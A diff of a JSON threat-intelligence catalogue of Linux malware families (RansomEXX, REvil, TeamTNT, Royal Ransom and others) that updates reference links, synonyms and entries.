+ "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195",
+ "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf"
],
"synonyms": [
"Defray777"
@@ -5640,6 +6138,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rapper_bot",
+ "https://socradar.io/linux-malware-rapperbot-brute-forcing-ssh-servers/",
+ "https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks",
"https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery"
],
"synonyms": [],
@@ -5705,8 +6205,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.red_alert",
+ "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/",
"https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/",
- "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/"
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html"
],
"synonyms": [
"N13V"
@@ -5721,15 +6222,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe",
- "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/",
"https://vms.drweb.com/virus/?i=7754026&lng=en",
"https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt",
- "https://twitter.com/billyleonard/status/1458531997576572929",
"https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/",
+ "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/",
"https://sansec.io/research/rekoobe-fishpig-magento",
+ "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/",
"https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/"
+ "https://twitter.com/billyleonard/status/1458531997576572929",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt"
],
"synonyms": [],
"type": []
@@ -5743,8 +6244,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile",
"https://github.com/f0rb1dd3n/Reptile",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf"
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf"
],
"synonyms": [],
"type": []
@@ -5757,57 +6258,58 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil",
- "https://github.com/f0wl/REconfig-linux",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo",
- "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment",
- "https://www.bbc.com/news/technology-59297187",
- "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf",
- "https://twitter.com/VK_Intel/status/1409601311092490248",
"https://www.youtube.com/watch?v=mDUMpYAOMOo",
- "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
- "https://home.treasury.gov/news/press-releases/jy0471",
- "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/",
- "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf",
- "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/",
- "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021",
- "https://analyst1.com/file-assets/History-of-REvil.pdf",
+ "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo",
"https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5",
- "https://angle.ankura.com/post/102hcny/revix-linux-ransomware",
- "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
- "https://threatpost.com/ransomware-revil-sites-disappears/167745/",
- "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
- "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html",
- "https://ke-la.com/will-the-revils-story-finally-be-over/",
- "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
- "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://twitter.com/VK_Intel/status/1409601311092490248?s=20",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
- "https://twitter.com/IntezerLabs/status/1452980772953071619",
- "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
- "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/",
- "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya",
- "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
- "https://malienist.medium.com/revix-linux-ransomware-d736956150d0",
- "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
- "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
"https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "https://www.youtube.com/watch?v=ptbNMlWxYnE",
- "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf",
- "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
+ "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
+ "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
"https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/",
- "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/"
+ "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://malienist.medium.com/revix-linux-ransomware-d736956150d0",
+ "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf",
+ "https://home.treasury.gov/news/press-releases/jy0471",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
+ "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
+ "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf",
+ "https://ke-la.com/will-the-revils-story-finally-be-over/",
+ "https://angle.ankura.com/post/102hcny/revix-linux-ransomware",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
+ "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
+ "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend",
+ "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
+ "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/",
+ "https://analyst1.com/file-assets/History-of-REvil.pdf",
+ "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
+ "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021",
+ "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
+ "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
+ "https://threatpost.com/ransomware-revil-sites-disappears/167745/",
+ "https://www.bbc.com/news/technology-59297187",
+ "https://github.com/f0wl/REconfig-linux",
+ "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
+ "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html",
+ "https://twitter.com/IntezerLabs/status/1452980772953071619",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.youtube.com/watch?v=ptbNMlWxYnE",
+ "https://twitter.com/VK_Intel/status/1409601311092490248?s=20",
+ "https://twitter.com/VK_Intel/status/1409601311092490248",
+ "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/",
+ "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/",
+ "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment"
],
"synonyms": [
"REvix"
@@ -5862,9 +6364,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro",
+ "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/",
"https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro",
- "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/",
- "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/"
+ "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/"
],
"synonyms": [],
"type": []
@@ -5872,6 +6374,23 @@
"uuid": "66fb7b48-60f2-44fc-9cbe-f70e776d058b",
"value": "RotaJakiro"
},
+ {
+ "description": "According to Trendmicro, Royal ransomware was first observed in September 2022, and the threat actors behind it are believed to be seasoned cybercriminals who used to be part of Conti Team One.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.royal_ransom",
+ "https://unit42.paloaltonetworks.com/royal-ransomware/",
+ "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html"
+ ],
+ "synonyms": [
+ "Royal",
+ "Royal_unix"
+ ],
+ "type": []
+ },
+ "uuid": "4e29dae1-5a8c-4b3c-81dc-dcc0fdd3c93a",
+ "value": "Royal Ransom (ELF)"
+ },
{
"description": "",
"meta": {
@@ -5890,26 +6409,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori",
- "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/",
- "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori",
"https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/",
- "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/",
+ "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/",
+ "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori",
"http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/",
+ "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/",
"https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/",
- "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/"
+ "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "1ad4697b-3388-48ed-8621-85abebf5dbbf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0",
"value": "Satori"
},
@@ -5918,8 +6428,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sbidiot",
- "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/",
"https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/",
+ "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/",
"https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/"
],
"synonyms": [],
@@ -6001,9 +6511,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sowat",
- "https://twitter.com/bkMSFT/status/1417823714922610689",
"https://twitter.com/billyleonard/status/1417910729005490177",
"https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003",
+ "https://twitter.com/bkMSFT/status/1417823714922610689",
"https://imp0rtp3.wordpress.com/2021/11/25/sowat/"
],
"synonyms": [],
@@ -6057,9 +6567,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.speculoos",
- "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
"https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas"
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html"
],
"synonyms": [],
"type": []
@@ -6078,15 +6588,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "f258f96c-8281-4b24-8aa7-4e23d1a5540e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "275d65b9-0894-4c9b-a255-83daddb2589c",
"value": "SSHDoor"
},
@@ -6095,12 +6596,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/",
+ "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/",
"https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/",
+ "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/",
"https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/",
- "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/",
- "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/"
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/"
],
"synonyms": [],
"type": []
@@ -6113,10 +6614,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi",
- "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/",
"https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html",
- "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://www.mandiant.com/resources/unc2891-overview"
+ "https://www.mandiant.com/resources/unc2891-overview",
+ "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/"
],
"synonyms": [],
"type": []
@@ -6165,15 +6666,28 @@
"uuid": "d2748a0c-8739-4006-95c4-bdf6350d7fa9",
"value": "Suterusu"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sword2033",
+ "https://unit42.paloaltonetworks.com/alloy-taurus/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9c1a32c7-45b4-4d3a-9d15-300b353f32a7",
+ "value": "Sword2033"
+ },
{
"description": "A malware capable of capturing credentials and enabling backdoor access, implemented as a userland rootkit. It uses three methods for hiding its network activity, by hooking and hijacking 1) fopen/fopen64, 2) eBPF, 3) a set of libpcap functions.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.symbiote",
- "https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat",
+ "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/",
"https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/",
- "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote",
- "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/"
+ "https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat",
+ "https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote"
],
"synonyms": [],
"type": []
@@ -6186,9 +6700,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysjoker",
+ "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html",
"https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/",
- "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/",
- "https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html"
+ "https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/"
],
"synonyms": [],
"type": []
@@ -6201,9 +6715,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sysrvhello",
+ "https://www.lacework.com/sysrv-hello-expands-infrastructure/",
"https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
"https://www.riskiq.com/blog/external-threat-management/sysrv-hello-cryptojacking-botnet/",
- "https://www.lacework.com/sysrv-hello-expands-infrastructure/",
"https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet"
],
"synonyms": [
@@ -6219,28 +6733,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt",
- "https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://unit42.paloaltonetworks.com/atoms/thieflibra/",
- "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
- "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials",
- "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
- "https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment",
- "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server",
- "https://unit42.paloaltonetworks.com/atoms/adept-libra/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf",
"https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/",
"https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/",
- "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera",
- "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/",
+ "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment",
"https://sysdig.com/blog/teamtnt-aws-credentials/",
- "https://tolisec.com/active-crypto-mining-operation-by-teamtnt/",
- "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf",
- "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool",
"https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
"https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools",
- "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"
+ "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://tolisec.com/active-crypto-mining-operation-by-teamtnt/",
+ "https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html",
+ "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/",
+ "https://unit42.paloaltonetworks.com/atoms/adept-libra/",
+ "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials",
+ "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server",
+ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
+ "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/",
+ "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
+ "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool",
+ "https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html",
+ "https://unit42.paloaltonetworks.com/atoms/thieflibra/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
"type": []
@@ -6307,30 +6821,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://twitter.com/ESETresearch/status/1382054011264700416",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
- "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
"https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
"https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf"
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
+ "https://twitter.com/ESETresearch/status/1382054011264700416",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a71ed71f-b8f4-416d-9c57-910a42e59430",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "592f7cc6-1e07-4d83-8082-aef027e9f1e2",
"value": "TSCookie"
},
@@ -6352,28 +6858,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
- "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
- "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
- "https://sysdig.com/blog/muhstik-malware-botnet-analysis/",
- "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
- "https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt",
- "https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server",
- "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/",
+ "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/",
"https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
+ "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/",
"https://blog.aquasec.com/fileless-malware-container-security",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
"https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
